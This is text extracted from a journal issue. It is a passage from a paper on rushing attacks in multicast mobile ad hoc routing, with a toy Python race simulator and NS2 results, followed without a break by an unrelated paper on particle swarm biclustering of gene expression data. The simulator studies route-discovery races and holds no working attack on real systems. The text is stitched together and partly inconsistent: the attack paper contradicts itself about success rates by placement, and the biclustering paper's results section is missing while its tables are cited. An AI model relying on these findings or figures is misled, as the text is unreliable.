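        seen.add(node)
        pred[node] = sender              # first copy wins the race
        for n in graph[node]:
            heapq.heappush(events, (t + delay[node], next(tie), n, node))
    path, n = [], dest
    while n != source:                   # walk predecessors back to the source
        path.append(n)
        n = pred[n]
    return list(reversed(path))

# Toy topology (Steps 1-3): attacker X sits beside the honest chain
# S - N1 - N2 - R and bypasses N1 with a near-zero forwarding delay.
graph = {'S': ['N1', 'X'], 'N1': ['S', 'N2'], 'N2': ['N1', 'R'],
         'R': ['N2'], 'X': ['N2']}
delay = {'S': 1.0, 'N1': 1.0, 'N2': 1.0, 'R': 1.0, 'X': 0.01}
```

Here `discover_route(graph, delay, 'S', 'R')` returns `['X', 'N2', 'R']`: the rushed copy reaches N2 first, so N2 records X as its predecessor, and the later legitimate copy via N1 is discarded as a duplicate (Step 8: the attacker has invaded the forwarding path).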
D. Rushing Attack Based on Three Scenarios
i. Rushing attack near the sender
Figure 4. Rushing node near the sender
In Figure 4, node S sends packets to the destination node R. The attacker node A is placed near the sender. The data packets from the sender are forwarded to both node A and node C at the same time. The attacker node forwards the data packet to node E more quickly than node C does; the packet then travels through nodes G and B. Finally, the receiver R receives the data packets forwarded by the attacker node. The Attack Success Rate for this scenario is then calculated.
Algorithm for near sender
Step 1: Create a set of n nodes.
Step 2: Create connections between the nodes.
Step 3: Place the attacker node near the sender.
Step 4: The sender sends packets through the specified path.
Step 5: The other forwarding nodes forward each packet to the next node.
Step 6: The attacker node taps all the packets.
Step 7: The attacker node quickly forwards the packets to the next node closest to the receiver.
Step 8: The data packets finally reach the destination node.
ii. Rushing attack near the receiver
Figure 5. Rushing node near the receiver
In Figure 5, node S sends packets to the destination node R. The attacker node A is placed near the receiver. The sender forwards the data packets to both node B and node C at the same time. A data packet can pass through nodes B, E and G, or through nodes C, F and G. When a data packet reaches the attacker node A, A quickly forwards it to node R. The Attack Success Rate for this scenario is then calculated.
Algorithm for near receiver
Step 1: Create a set of n nodes.
Step 2: Create connections between the nodes.
Step 3: Place the attacker node near the receiver.
Step 4: The sender sends packets through the specified path.
Step 5: The other forwarding nodes forward each packet to the next node.
Step 6: The attacker node taps all the packets on the specified path.
Step 7: The attacker node then quickly forwards the packets.
Step 8: The intermediate node forwards the packets to the destination node.
iii. Rushing attack anywhere within the network
In Figure 6, node S sends packets to the destination node R. The attacker node A is placed arbitrarily within the network. The data packet from the sender is forwarded to nodes B and C. One copy is forwarded through nodes B and E, while the other passes through node C and then to the attacker node A, which forwards it to node G more quickly than node E does. The data packet then finally reaches the receiver node R through node F. The Attack Success Rate for this scenario is then calculated.
Algorithm for anywhere within network
Step 1: Create a set of n nodes.
Step 2: Create connections between the nodes.
Step 3: Place the attacker node anywhere within the network.
Step 4: The sender sends packets through the specified path.
Step 5: The other forwarding nodes forward each packet to the next node.
Step 6: The attacker node taps all the packets.
Step 7: The attacker node then quickly forwards the packets.
Step 8: Each intermediate node forwards the packet to the next node until it reaches the destination.
Figure 6. Rushing node placed anywhere within the network
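The three placement algorithms differ only in Step 3, so they can be sketched as one parameterized Monte Carlo routine (all names, topology and delay ranges are our own illustrative choices, not the NS2/MAODV setup of Section IV). The attacker bypasses one two-hop segment of a chain of forwarding nodes and ends up on the discovered route whenever its rushed forwarding beats the honest node's processing delay. In this simplified race model the rushing node always wins; the differences between the three placements reported in Section IV arise from the richer NS2 topologies and traffic that this sketch does not model.

```python
import random

def rushed_route_includes_attacker(chain_delays, i, attacker_delay=0.01):
    """Does the attacker, bypassing the two-hop segment i -> i+2 of a
    chain, deliver the Route Request to node i+2 first? It wins iff
    its forwarding delay beats node i+1's processing delay."""
    return attacker_delay < chain_delays[i + 1]

def attack_success_rate(placement, hops=8, trials=200, seed=1):
    """Fraction of random trials in which the rushing node ends up on
    the discovered route, for the three placements of this section."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        # per-node processing delays along the chain S, 1, ..., hops-1, R
        delays = [rng.uniform(0.5, 1.5) for _ in range(hops + 1)]
        if placement == 'near_sender':
            i = 0                        # bypass the first segment
        elif placement == 'near_receiver':
            i = hops - 2                 # bypass the last segment
        else:                            # anywhere within the network
            i = rng.randrange(hops - 1)
        hits += rushed_route_includes_attacker(delays, i)
    return hits / trials
```

Because the attacker's delay (0.01) is always below the honest minimum (0.5), the rushed copy wins every race here regardless of placement; varying `attacker_delay` toward the honest range is one simple way to make the success rate drop below 1.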
IV. EXPERIMENTAL RESULTS AND DISCUSSION
Introduction
The algorithm is evaluated against known network metrics and against metrics specific to the impact of the rushing attack on the multicast scheme. Comparisons are made with the rushing attacker node placed near the sender, near the receiver, and uniformly distributed within the network.
Metrics for evaluation: the known network metric used for performance evaluation is the packet delivery ratio.
Simulation Results
We ran several simulations under Linux using the network simulator NS2 (version ns-allinone-2.26). The simulation environment is composed of:
- area: 500 x 500 meters;
- number of nodes: 50-100;
- simulation duration: 1000 s;
- physical/MAC layer: IEEE 802.11 at 2 Mbps, 250-meter transmission range;
- mobility model: random waypoint with no pause time and node movement speeds of 0 m/s, 1 m/s and 10 m/s;
- routing protocols: AODV and MAODV under NS2.26.
A. Rushing Attack near the Sender (One Sender and Five Receivers)
When the rushing attack happens near the sender in an ad hoc network, the attack success rate is average, because the attacker has to search only the intermediate nodes. If there is no rushing attack in the network, the average attack success rate is the lowest.
Figure 7. Rushing attack near the sender: Average Attack Success Rate (%) versus process delay (ms), with and without the rushing attack.
B. Rushing Attack near the Receiver
Figure 8. Rushing attack near the receiver: Average Attack Success Rate (%) versus process delay (ms), with and without the rushing attack.
Figure 8 shows that the Attack Success Rate goes high because the rushing node is placed near the receiver, where most of the forwarding nodes carry all the packets. Since the attacker node is close to the receiver, it can capture each packet as soon as the packet reaches a forwarding node near the receiver. The receiver therefore gets the packets quickly from the nearby attacker node, and the impact of the attack is highly harmful.
C. Rushing Attack Anywhere in the Network
Figure 9 shows that the Attack Success Rate is the lowest when the rushing node is placed arbitrarily in the network, neither near the sender nor near the receiver but as an ordinary forwarding node in the group. The forwarding node (the rushing attacker) taps the packets and quickly forwards them to the next node. The chance of capturing packets therefore depends on the upcoming nodes, so the impact of the attack is the least: the Attack Success Rate is well below that of the near-receiver scenario, which is the highest, and also below that of the near-sender scenario, in which the Attack Success Rate is low.
Figure 9. Rushing attack anywhere in the network: Average Attack Success Rate (%) versus process delay (ms), with and without the rushing attack.
V. CONCLUSION AND FUTURE DIRECTIONS
A. Conclusion
Rushing attacks are more likely to succeed in a multicast session where the number of multicast senders is small and/or the number of multicast receivers is large. The goal of this work was to characterize the attack success rate as a function of the rushing attacker's position in the network. With respect to attack position, the best position from which to launch rushing attacks is near the receiver, which yields the highest success rates. A rushing attack near the sender has a low success rate, and an attack launched from an arbitrary position in the network has the least success rate.
B. Future Directions
This work deals with one sender and multiple receivers in a multicast ad hoc network. It can be enhanced to handle multiple senders and multiple receivers.
This work also assumes only one attacker node in the network; in the future, it can be extended by adding more attacker nodes.
REFERENCES
[1] Ping Yi, Zhoulin Dai, Shiyong Zhang and Yiping Zhong, "A New Routing Attack in Mobile Ad Hoc Networks", International Journal of Information Technology, Vol. 11, No. 2, pp. 83-94.
[2] D. Bruschi and E. Rosti, "Secure Multicast in Wireless Networks of Mobile Hosts: Protocols and Issues", Mobile Networks and Applications, Vol. 7, 2002, pp. 503-511.
[3] M. J. Moyer, J. R. Rao and P. Rohatgi, "A Survey of Security Issues in Multicast Communication", IEEE Network, Nov.-Dec. 1999, pp. 12-23.
[4] Jiejun Kong, "GVG-RP: A Net-centric Negligibility-based Security Model for Self-organizing Networks".
[5] S. Corson and J. Macker, "Mobile Ad hoc Networking (MANET): Routing Protocol Performance Issues and Evaluation Considerations", RFC 2501, January 1999.
[6] C. Schuba, I. Krsul, M. Kuhn, E. Spafford, A. Sundaram and D. Zamboni, "Analysis of a Denial of Service Attack on TCP", Proceedings of the 1997 IEEE Symposium on Security and Privacy.
[7] Haining Wang, Danlu Zhang and Kang G. Shin, "Detecting SYN Flooding Attacks", IEEE INFOCOM 2002, New York City, 2002.
[8] Jiejun Kong, Xiaoyan Hong and Mario Gerla, "A New Set of Passive Routing Attacks in Mobile Ad Hoc Networks", work funded by the MINUTEMAN project and a related STTR project of the Office of Naval Research, pp. 1-6.
[9] Jiejun Kong, Xiaoyan Hong and Mario Gerla, "Modeling Ad-hoc Rushing Attack in a Negligibility-based Security Framework", September 29, 2006, Los Angeles, California, USA.
[10] Hoang Lan Nguyen and Uyen Trang Nguyen, "A Study of Different Types of Attacks on Multicast in Mobile Ad Hoc Networks", Ad Hoc Networks, Vol. 6, 2008, pp. 32-46.
[11] S. J. Lee, W. Su and M. Gerla, "On-Demand Multicast Routing Protocol in Multihop Wireless Mobile Networks", ACM/Kluwer Mobile Networks and Applications, Vol. 7, No. 6, 2002, pp. 441-453.
[12] Imad Aad, Jean-Pierre Hubaux and Edward W. Knightly, "Impact of Denial of Service Attacks on Ad Hoc Networks".
[13] Y.-C. Hu, A. Perrig and D. B. Johnson, "Ariadne: A Secure On-demand Routing Protocol for Ad Hoc Networks", in Proceedings of MobiCom 2002, September 2002.
[14] M. Zapata and N. Asokan, "Securing Ad Hoc Routing Protocols", in Proceedings of the ACM Workshop on Wireless Security (WiSe), 2002.
[15] Y.-C. Hu, A. Perrig and D. B. Johnson, "Efficient Security Mechanisms for Routing Protocols", in Network and Distributed System Security Symposium (NDSS), 2003.
[16] Yih-Chun Hu, Adrian Perrig and David B. Johnson, "Rushing Attacks and Defense in Wireless Ad Hoc Network Routing Protocols", WiSe 2003, September 19, 2003, San Diego, California, USA.
[17] H. Yang, H. Luo, F. Ye, S. Lu and L. Zhang, "Security in Mobile Ad Hoc Networks: Challenges and Solutions", IEEE Wireless Communications, Vol. 11, Issue 1, February 2004, pp. 38-47.
[18] C. Besemann, S. Kawamura and F. Rizzo, "Intrusion Detection System in Wireless Ad-Hoc Networks: Sybil Attack Detection and Others".
A Hybrid Multi-Objective Particle Swarm Optimization
Method to Discover Biclusters in Microarray Data
Mohsen Lashkargir*
Department of Computer Engineering
Islamic Azad University, Najafabad Branch
Isfahan, 81746, Iran
e-mail: mlashkargir@gmail.com
S. Amirhassan Monadjemi
Department of Computer Engineering
Faculty of Engineering
University of Isfahan
Isfahan, 81746, Iran
Ahmad Baraani Dastjerdi
Department of Computer Engineering
Faculty of Engineering
University of Isfahan
Isfahan, 81746, Iran
Abstract — In recent years, with the development of
microarray technique, discovery of useful knowledge from
microarray data has become very important. Biclustering is a
very useful data mining technique for discovering genes which
have similar behavior. In microarray data, several objectives
have to be optimized simultaneously and often these
objectives are in conflict with each other. A Multi-Objective
model is capable of solving such problems. Our method proposes a hybrid algorithm based on Multi-Objective Particle Swarm Optimization for discovering biclusters in gene expression data. In our method, we consider a low level of overlap among the biclusters and try to cover all elements of the gene expression matrix. Experimental results on the benchmark databases show a significant improvement in both overlap among biclusters and coverage of elements in the gene expression matrix.
Keywords: biclustering; Multi-Objective Particle Swarm; gene expression data
I. INTRODUCTION
The microarray technique allows the measurement of mRNA levels simultaneously for thousands of genes. It is now possible to monitor the expression of thousands of genes in parallel over many experimental conditions (e.g., different patients, tissue types, and growth environments), all within a single experiment. Microarray data forms a data matrix in which rows represent genes and columns represent conditions. Each entry in the matrix shows the expression level of a specific gene (gi) under a particular condition (cj). Through analysis of gene expression data, genes that exhibit similar behavior among a subset of conditions can be found. Clustering has been used for the analysis of gene expression data [14], but genes do not show similar behavior across all conditions; rather, genes may behave similarly only in a subset of conditions [3]. In this case, both rows and columns (genes and conditions) are clustered simultaneously, which is referred to as biclustering [2].
The biclustering problem is even more difficult than clustering, since we try to find clusters along two dimensions instead of one.
The first practical biclustering algorithm was proposed by Cheng and Church [1] in 2000. They introduced the residue of an element in a bicluster and the mean squared residue of a submatrix as quality measures for biclusters. This is a good measurement tool for biclustering, and we use it in this work. Getz et al. [15] presented coupled two-way clustering, which applies hierarchical clustering separately to each dimension and defines a process to combine both results; the time complexity of this method is exponential. Yang et al. improved the Cheng and Church approach to find K possibly overlapping biclusters simultaneously [3]; their method is also robust against missing values, which are handled by taking the bicluster volume (number of non-missing elements) into account when computing the score.
The biclustering problem is proven to be NP-hard [1]. This high complexity has motivated researchers to use stochastic approaches to find biclusters. Federico and Aguilar proposed a biclustering algorithm based on evolutionary computation [4]. In biclustering of gene expression data, the goal is to find biclusters of maximum size, with a mean squared residue lower than a given δ and a relatively high row variance. In [4], the fitness function is a weighted sum of these objective functions. Since the biclustering problem involves objectives that are in conflict with each other, multi-objective methods are well suited to solve it. In this work we address the biclustering problem as a multi-objective problem, hybridized with the Cheng and Church algorithm.
This paper is organized as follows: in Section 2, the definitions related to biclustering are presented. An introduction to PSO and binary PSO is given in Section 3. The
description of the algorithm is given in Section 4. Experimental results and comparative analysis are discussed in Section 5. The last section is the conclusion.
II. BICLUSTERING
A bicluster is defined on a gene expression matrix. Let G = {g1, ..., gN} be a set of genes and C = {c1, ..., cM} be a set of conditions. The gene expression matrix is a matrix of real numbers, with possible null values, where each entry eij corresponds to the logarithm of the relative abundance of the mRNA of gene gi under a specific condition cj [4]. A bicluster in gene expression data corresponds to a submatrix whose genes show similar behavior under a subset of conditions; a bicluster is thus given by a subset of genes and a subset of conditions. The similarity of behavior between genes is measured by the mean squared residue, introduced by Cheng and Church.
Definition 1: Let $(I, J)$ be a bicluster ($I \subseteq G$, $J \subseteq C$). Then the mean squared residue $r_{IJ}$ of the bicluster $(I, J)$ is calculated as:

$$ r_{IJ} = \frac{1}{|I||J|} \sum_{i \in I,\, j \in J} \left( e_{ij} - e_{iJ} - e_{Ij} + e_{IJ} \right)^2 \qquad (1) $$

where

$$ e_{iJ} = \frac{1}{|J|} \sum_{j \in J} e_{ij} \qquad (2) $$

$$ e_{Ij} = \frac{1}{|I|} \sum_{i \in I} e_{ij} \qquad (3) $$

$$ e_{IJ} = \frac{1}{|I||J|} \sum_{i \in I,\, j \in J} e_{ij} \qquad (4) $$
The lower the mean squared residue, the stronger the coherence exhibited by the bicluster and the higher its quality. If a bicluster has a mean squared residue lower than a given value δ, then we call it a δ-bicluster. In addition to the mean squared residue, the row variance is required to be relatively large in order to reject trivial biclusters.
Definition 2: Let $(I, J)$ be a bicluster. The row variance of $(I, J)$ is defined as

$$ \mathrm{var}_{IJ} = \frac{1}{|I||J|} \sum_{i \in I,\, j \in J} \left( e_{ij} - e_{iJ} \right)^2 \qquad (5) $$
Biclusters characterized by high values of row variance contain genes that present large changes in their expression values under different conditions.
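As a concrete illustration of Equations (1)-(5), the sketch below computes the mean squared residue and row variance of a submatrix in plain Python (the function name and data layout are our own; the paper's experiments use their own implementation):

```python
def msr_and_row_variance(E, rows, cols):
    """Mean squared residue (Eq. 1) and row variance (Eq. 5) of the
    bicluster (rows, cols) of the expression matrix E."""
    sub = [[E[i][j] for j in cols] for i in rows]
    n, m = len(rows), len(cols)
    row_means = [sum(r) / m for r in sub]                                 # e_iJ, Eq. (2)
    col_means = [sum(sub[i][j] for i in range(n)) / n for j in range(m)]  # e_Ij, Eq. (3)
    overall = sum(row_means) / n                                          # e_IJ, Eq. (4)
    msr = sum((sub[i][j] - row_means[i] - col_means[j] + overall) ** 2
              for i in range(n) for j in range(m)) / (n * m)
    row_var = sum((sub[i][j] - row_means[i]) ** 2
                  for i in range(n) for j in range(m)) / (n * m)
    return msr, row_var
```

A perfectly additive bicluster (e.g. $e_{ij} = a_i + b_j$) has zero residue, the ideal δ-bicluster, while its row variance remains non-trivial.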
III. MULTI-OBJECTIVE PARTICLE SWARM
Particle Swarm Optimization (PSO) is a population-based stochastic optimization technique developed by Kennedy and Eberhart in 1995 [5]. The method finds an optimal solution by simulating the social behavior of bird flocking. The population of potential solutions is called a swarm, and each individual solution within the swarm is called a particle. Particles in PSO fly through the search domain guided by their individual experience and the experience of the swarm. Each particle knows its best value so far (pbest) and its position; this information is an analogy of the personal experience of each particle. Moreover, each agent knows the best value so far in the group (gbest) among all pbests; this information is an analogy of the knowledge of how the other particles around it have performed.
Each particle modifies its position using this information: the current positions (x1, x2, ..., xd), the current velocities (v1, v2, ..., vd), the distance between the current position and pbest, and the distance between the current position and gbest. The velocity includes a component in the direction of the previous motion (inertia). The movement of the particle towards the optimum solution is governed by updating its position and velocity attributes.
The velocity and position update equations are given as [7]:

$$ v_i^{k+1} = w\, v_i^k + c_1\, \mathrm{rand}_1 \cdot (pbest_i - s_i^k) + c_2\, \mathrm{rand}_2 \cdot (gbest - s_i^k) \qquad (6) $$

$$ s_i^{k+1} = s_i^k + v_i^{k+1} $$

where $v_i^k$ is the velocity of agent $i$ at iteration $k$, $w$ is the weighting (inertia) function, $c_j$ are the weighting coefficients, $\mathrm{rand}$ is a random number between 0 and 1, $s_i^k$ is the current position of agent $i$ at iteration $k$, $pbest_i$ is the pbest of agent $i$, and $gbest$ is the gbest of the group.
A. Binary Particle Swarm Optimization
The binary Particle Swarm Optimization (BinPSO) algorithm was also introduced by Kennedy and Eberhart, to allow the PSO algorithm to operate in binary problem spaces [11]. It uses the concept of velocity as a probability that a bit (position) takes on one or zero. In BinPSO, the velocity update remains the same as in basic PSO; however, the position update is redefined by the following rule [11]:
s_i^{k+1} = 1 if r3 < S(v_i^{k+1}); otherwise s_i^{k+1} = 0    (7)
with r3 ~ U(0, 1), where S(·) is a sigmoid function transforming the velocity into a probability constrained to the interval [0.0, 1.0], as follows:
S(v) = 1 / (1 + e^(−v))    (8)

where S(v) ∈ (0, 1), S(0) = 0.5, and r3 is a quasi-random number selected from a uniform distribution on [0.0, 1.0]. For a velocity of 0, the sigmoid function returns a probability of 0.5, implying that there is a 50% chance for the bit to flip.
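Eqs. (7) and (8) can be sketched directly; the rng parameter is an assumption added here so the rule can be exercised deterministically:

```python
import math
import random

def sigmoid(v):
    """Eq. (8): S(v) = 1 / (1 + e^(-v)), mapping velocity to (0, 1)."""
    return 1.0 / (1.0 + math.exp(-v))

def binpso_position(velocity, rng=random.random):
    """Eq. (7): bit d becomes 1 when r3 < S(v_d), otherwise 0."""
    return [1 if rng() < sigmoid(v) else 0 for v in velocity]
```

A strongly positive velocity drives the bit toward 1, a strongly negative one toward 0, and a zero velocity leaves the bit to a fair coin flip.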
B. Particle Swarm and Multi-Objective Problems
The success of the Particle Swarm Optimization (PSO)algorithm as a single objective optimizer has motivatedresearchers to extend the use of this bio-inspired technique to
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009
Multi-Objective problems [6]. In problems with more than one conflicting objective, there exists no single optimum solution; rather, there exists a set of solutions which are all optimal, involving trade-offs between the conflicting objectives (the Pareto-optimal set).
Definition 3: If there are M objective functions, a solution x is said to dominate another solution y if x is no worse than y in all M objective functions and x is strictly better than y in at least one of the M objective functions. Otherwise, the two solutions are non-dominating with respect to each other. This concept is shown in Fig. 1.
Definition 4: If Z is a subset of feasible solutions, a solution x∈Z is said to be non-dominated with respect to Z if there does not exist another solution y∈Z that dominates x (red points in Fig. 1).
Definition 5: If F is the set of feasible solutions, a solution x∈F is said to be Pareto-optimal if x is non-dominated with respect to F (red points in Fig. 1, if we suppose all feasible solutions are shown in Fig. 1).
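Definition 3 translates directly into code; a minimal sketch for minimization objectives:

```python
def dominates(x, y):
    """Definition 3 for minimization: x dominates y when x is no worse
    in every objective and strictly better in at least one."""
    return all(a <= b for a, b in zip(x, y)) and \
           any(a < b for a, b in zip(x, y))
```

For example, (1, 2) dominates (2, 2), while (1, 3) and (2, 2) are non-dominating with respect to each other.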
In a Multi-Objective optimization problem, we determine the Pareto-optimal set from the set of feasible solutions. In this problem, we must also consider the diversity among the solutions in the Pareto set. For maintaining diversity in the Pareto-optimal set, we use the crowding distance provided by Deb [12]. In Multi-Objective PSO, the non-dominated solutions found are stored in an archive. After each motion of the swarm, the archive is updated as follows:

If an element in the archive is dominated by a new solution, the corresponding element is removed from the archive. If the new solution is not dominated by any element in the archive, the new solution is added to the archive. If the archive is full, crowding distances between elements in the archive are computed according to [12], and then one element in the archive is selected for removal according to diversity. We use roulette wheel selection to do this.
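The archive-update rule above can be sketched as follows; this is a simplified illustration, and the crowding_distance function is assumed to be supplied externally (e.g. computed as in [12]):

```python
import random

def dominates(x, y):
    # Pareto dominance for minimization (Definition 3).
    return all(a <= b for a, b in zip(x, y)) and \
           any(a < b for a, b in zip(x, y))

def update_archive(archive, cand, max_size, crowding_distance, rng=random):
    """Archive update rule described above: drop members dominated by the
    new solution, insert it if nothing dominates it, and on overflow use
    roulette wheel selection biased toward crowded members to evict one."""
    archive = [a for a in archive if not dominates(cand, a)]
    if not any(dominates(a, cand) for a in archive):
        archive.append(cand)
    if len(archive) > max_size:
        dists = [crowding_distance(a, archive) for a in archive]
        # Eviction weight ~ inverse crowding distance: crowded points
        # (small distance) are more likely to be removed.
        weights = [1.0 / (d + 1e-9) for d in dists]
        victim = rng.choices(range(len(archive)), weights=weights, k=1)[0]
        archive.pop(victim)
    return archive
```

The same inverse-vs-direct weighting idea applies to gbest selection, except there the roulette wheel favors members with *large* crowding distance so the swarm is pulled toward sparse regions of the front.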
In (6), each particle needs gbest in order to move in the search space. In Multi-Objective PSO we have a set of gbests, called the archive. There exist many different ways to select gbest; more detail is described in [6]. In our method, gbest is selected from the archive based on crowding distance, to maintain diversity: if an element in the archive has more diversity, it has a greater chance of being selected as gbest. We use roulette wheel selection to do this. Thus the particles move toward the Pareto-optimal set, and diversity is maintained through roulette wheel selection of gbest.

IV. OUR HYBRID MULTI-OBJECTIVE PSO METHOD
Our goal is to find biclusters (I, J) (I a subset of genes, J a subset of conditions) of maximum size, with mean squared residue lower than a given δ, with relatively high row variance, and with a low level of overlap among biclusters.
Figure 1. Example of the dominance and non-dominance concepts (f1 and f2 must be minimized). Red points dominate blue and yellow points. Red points are non-dominated with respect to each other.
The size of a bicluster is defined as |I|·|J|. If we used this definition as a single objective, then since the number of rows is higher than the number of columns, the columns would have less effect on the objective. So we separate rows and columns and consider two objective functions, one for rows and one for columns. The problem is formulated as below:
Find (I, J)

that minimize

f1(I, J) = 1 / |I|    (9)

f2(I, J) = 1 / |J|    (10)

f3(I, J) = r(I, J)    (11)

f4(I, J) = 1 / Var(I, J)    (12)

subject to

r(I, J) ≤ δ    (13)
In our method, MOPSO with crowding distance is used for solving this problem, and it cooperates with a local search to find better solutions. Since this problem has a constraint (13), we do not apply this constraint while particles move in the search space. We allow particles to move without any constraint in the search space so that they can better discover new solutions, but we add a particle to the archive only if it satisfies the constraint, and a particle can serve as gbest only if the constraint holds for it. The problem of overlap among biclusters is addressed in our method as below:
First, the archive size equals 100. After the motion and the update of the archive, only the 50 particles in the archive that have minimum overlap move to the next generation. So
an archive with variable size is used. Then, in the next generation, the elements that can be selected as gbest have minimum overlap.
We encode a bicluster as a particle, as in [4, 9, 13]. Each particle in the swarm encodes one bicluster. Biclusters are encoded by means of binary strings of length N+M, where N and M are the number of rows (genes) and the number of columns (conditions), respectively. In each particle, the first N bits of the binary string are related to genes and the remaining M bits are related to conditions. If a bit is set to 1, the related gene or condition belongs to the encoded bicluster; otherwise it does not.
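The encoding can be illustrated with a small decoding helper (hypothetical names, assuming 0-based gene and condition indices):

```python
def decode(particle, n_genes):
    """Split a binary particle of length N+M into (genes, conditions):
    the first N bits select genes, the remaining M bits select conditions."""
    genes = [i for i in range(n_genes) if particle[i] == 1]
    conds = [j for j in range(len(particle) - n_genes)
             if particle[n_genes + j] == 1]
    return genes, conds

# N = 3 genes, M = 2 conditions: genes 0 and 2 and condition 1 are selected.
bicluster = decode([1, 0, 1, 0, 1], 3)
```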
A general scheme of our algorithm is given in Figure 3. The population is randomly initialized and the velocity of each particle in each dimension is set to zero. The non-dominated population is then inserted into the archive; after that, we use a local search algorithm to move the archive into the feasible region. We use the Cheng and Church algorithm as the local search. The local search algorithm starts with a given bicluster. The irrelevant genes or conditions having mean squared residue above (or below) a certain threshold are then selectively eliminated (or added) using the following conditions [1]. A "node" refers to a gene or a condition. This algorithm contains three phases: a multiple node deletion phase, a single node deletion phase, and a multiple node addition phase.
• Multiple node deletion:
a) Compute r_IJ, e_Ij, e_iJ, e_IJ of the bicluster by (1)–(5).
b) Remove all genes i∈I satisfying (1/|J|) Σ_{j∈J} (e_ij − e_iJ − e_Ij + e_IJ)² > α·r_IJ.
c) Recompute r_IJ, e_Ij, e_iJ, e_IJ.
d) Remove all conditions j∈J satisfying (1/|I|) Σ_{i∈I} (e_ij − e_iJ − e_Ij + e_IJ)² > α·r_IJ.
• Single node deletion:
a) Recompute r_IJ, e_Ij, e_iJ, e_IJ.
b) Remove the node with the largest mean squared residue (considering both genes and conditions), one at a time, until the mean squared residue drops below δ.
• Multiple node addition:
a) Recompute r_IJ, e_Ij, e_iJ, e_IJ.
b) Add all conditions j∉J with (1/|I|) Σ_{i∈I} (e_ij − e_iJ − e_Ij + e_IJ)² ≤ r_IJ.
c) Recompute r_IJ, e_Ij, e_iJ, e_IJ.
d) Add all genes i∉I with (1/|J|) Σ_{j∈J} (e_ij − e_iJ − e_Ij + e_IJ)² ≤ r_IJ.

Figure 2. The effects of local search in Multi-Objective optimization (f1 and f2 must be minimized).

This local search is applied to the particles in the archive. The effects of using local search are illustrated in Fig. 2, where the decrease of the objective functions is evident.
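A minimal sketch of the mean squared residue and the single-node-deletion phase of the Cheng and Church local search follows; it is illustrative only (the multiple deletion and addition phases follow the same pattern), and the toy matrix is invented for demonstration:

```python
import numpy as np

def msr(A, I, J):
    """Mean squared residue r_IJ of bicluster (I, J) (Cheng and Church [1])."""
    S = A[np.ix_(I, J)]
    residue = S - S.mean(axis=1, keepdims=True) \
                - S.mean(axis=0, keepdims=True) + S.mean()
    return float((residue ** 2).mean())

def single_node_deletion(A, I, J, delta):
    """Single-node-deletion phase: repeatedly drop the gene or condition
    with the largest mean squared residue until r_IJ <= delta."""
    I, J = list(I), list(J)
    while msr(A, I, J) > delta and (len(I) > 1 or len(J) > 1):
        S = A[np.ix_(I, J)]
        res = (S - S.mean(axis=1, keepdims=True)
                 - S.mean(axis=0, keepdims=True) + S.mean()) ** 2
        d_rows, d_cols = res.mean(axis=1), res.mean(axis=0)
        if len(I) > 1 and (len(J) <= 1 or d_rows.max() >= d_cols.max()):
            I.pop(int(d_rows.argmax()))   # remove the worst gene
        else:
            J.pop(int(d_cols.argmax()))   # remove the worst condition
    return I, J

# Rows 0 and 1 form a perfect additive bicluster; row 2 is noise.
A = np.array([[1.0, 2.0, 3.0],
              [2.0, 3.0, 4.0],
              [10.0, 0.0, 5.0]])
I, J = single_node_deletion(A, [0, 1, 2], [0, 1, 2], delta=0.01)
```

On this toy matrix the noisy gene is deleted first, after which the residue of the remaining additive bicluster drops to zero and the loop stops.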
Figure 3. A general scheme of our algorithm
TABLE III. HUMAN BICLUSTERS
Bicluster Genes Conditions Residue Row variance
1 1053 36 997.68 2463.42
27 839 42 1074.38 3570.61
49 105 81 1197.05 2885.34
73 487 22 769.56 5408.31
92 105 93 1007.41 7628.44
TABLE IV. COMPARISON WITH OTHER METHODS

Method      Avg size   Avg residue  Avg genes  Avg conditions  Max size
NAGA 2      33463.70   987.56       915.81     36.54           37560
SEEA 2 B    29874.8    1128.1       784.68     35.48           29654
MOPSOB      34012.24   927.47       902.41     40.12           37666
Our method  33983.64   946.78       1006.23    42.02           37908
VI. CONCLUSIONS
In this paper, we introduced an algorithm based on Multi-Objective PSO, incorporating local search, for finding biclusters in expression data. In the biclustering problem, several objectives have to be optimized simultaneously: we must find maximum-size biclusters with low mean squared residue and high row variance. These three objectives are in conflict with each other. We apply a hybrid MOPSO and use crowding distance to maintain diversity. In addition, we keep a low level of overlap among biclusters by using an archive with variable size. A comparative assessment of results is provided on benchmark gene expression data sets to demonstrate the effectiveness of the proposed method. Experimental results show that the proposed method is able to find interesting biclusters in expression data, and comparative analysis shows better performance.

Trying other Multi-Objective methods, such as simulated annealing, or employing a neural network for archive clustering can be suggested as future work. Decimal encoding of particles may also be attempted.
REFERENCES

[1] Y. Cheng and G.M. Church, "Biclustering of Expression Data," Proc. Eighth Int'l Conf. Intelligent Systems for Molecular Biology, pp. 93-103, 2000.
[2] S. Busygin, O. Prokopyev, and P.M. Pardalos, "Biclustering in data mining," Computers & Operations Research, vol. 35, pp. 2964-2987, 2008.
[3] S.C. Madeira and A.L. Oliveira, "Biclustering algorithms for biological data analysis: a survey," IEEE/ACM Transactions on Computational Biology and Bioinformatics, vol. 1, no. 1, pp. 24-45, 2004.
[4] F. Divina and J.S. Aguilar-Ruiz, "Biclustering of expression data with evolutionary computation," IEEE Transactions on Knowledge & Data Engineering, vol. 18, no. 5, pp. 590-602, 2006.
[5] J. Kennedy and R. Eberhart, "Particle swarm optimization," Proc. IEEE International Conference on Neural Networks, vol. 4, 1995.
[6] MAPSO2007.
[7] K.Y. Lee and M.A. El-Sharkawi, Modern Heuristic Optimization Techniques, IEEE Press, 2008.
[8] A.A. Alizadeh, M.B. Eisen, R.E. Davis, C. Ma, I.S. Lossos, A. Rosenwald, J.C. Boldrick, H. Sabet, T. Tran, and X. Yu, "Distinct types of diffuse large B-cell lymphoma identified by gene expression profiling," Nature, vol. 403, pp. 503-511, 2000.
[9] S. Mitra and H. Banka, "Multi-objective evolutionary biclustering of gene expression data," Pattern Recognition, vol. 39, no. 12, pp. 2464-2477, 2006.
[10] M. Reyes-Sierra and C.A.C. Coello, "Multi-Objective Particle Swarm Optimizers: A Survey of the State-of-the-Art," International Journal of Computational Intelligence Research, vol. 2, no. 3, pp. 287-308, 2006.
[11] J. Kennedy and R.C. Eberhart, "A discrete binary version of the particle swarm algorithm," Proc. IEEE International Conference on Systems, Man, and Cybernetics, vol. 5, 1997.
